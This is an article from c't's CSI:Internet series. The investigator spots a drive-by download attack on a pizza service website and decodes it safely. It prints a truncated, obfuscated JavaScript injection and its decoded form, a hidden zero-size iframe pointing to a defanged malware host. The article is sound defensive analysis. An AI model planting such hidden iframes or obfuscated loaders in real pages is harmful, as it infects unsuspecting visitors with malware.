The "CSI:Internet" series was originally published in c't magazine starting in issue 13/2010. For links to other articles in this series please refer to out CSI:Internet HQ page.The code fragments in this article may cause your anti-virus scanner to issue an alert. However, these are false alarms.
CSI:Internet
Episode 1: Alarm at the pizza service
by Thorsten Holz
As I'm selecting a pizza on the website of my favourite pizza service, my anti-virus scanner issues an alert: It claims to have found and removed a "trojan.backdoor". Let's see what's going on here.
I haven't really done anything on this computer today, and I usually keep it clean, too. So it's probably something to do with this web page I've just opened. So first of all, I take a look at the source code. If it really is an attack, the HTML code should contain some indication somewhere.
After a short search I do find something; there is a strange JavaScript segment at the end of the page:
<script>var c ='%25%33%43%69%66%72%61%6d%65[ ... ]%25%33%45';
var d=unescape(unescape(c));
document.write(unescape(d));
</script>
Evil does not only lurk in murky corners. More and more often, otherwise harmless web pages contain what is called a drive-by download.
That does look a lot like rubbish. Essentially, it repeatedly sends a long sequence of hexadecimal characters through the unescape() JavaScript function and then uses document.write to directly write it to the web page that is being displayed in the browser. A typical drive-by download scenario!
So how can a web page shift a trojan to my system just like that? I didn't click on anything. To understand what's happening, I somehow have to get my hands on the plain text code. On a test system, I would now save the page and simply replace the write command with an alert(). The browser would then conveniently display the decoded text in a pop-up window. However, this is my private computer, and I don't want to risk it. Who knows what else this guy has in store (if it really is a guy).
Therefore, I choose the slightly more involved but safer way by using SpiderMonkey to execute the code. My first attempt at throwing the script segment into Mozilla's JavaScript as a text file results in an error message, "ReferenceError: document is not defined". That's not surprising, because the document object is only defined within the browser context. After I've replaced document.write() with a simple print(), however, the code works fine:
$ js 1.js
<iframe src="hxxp://tissot333.cn/eleonore/index.php"
width="0" height="0" frameborder="0">
</iframe>
Looks like somebody injected an iFrame with a reference to another web page into the website of my favourite pizza service. They probably exploited a vulnerability in the web software used and added the code via a method such as SQL injection. A value of zero for the height and width of the embedded iFrame makes the iFrame as good as invisible – I'm smelling a rat.
![Kernel Log: Coming in 3.10 (Part 3) [--] Infrastructure](/imgs/43/1/0/4/2/6/7/2/comingin310_4_kicker-4977194bfb0de0d7.png)
![Kernel Log: Coming in 3.10 (Part 3) [--] Infrastructure](/imgs/43/1/0/4/2/3/2/3/comingin310_3_kicker-151cd7b9e9660f05.png)
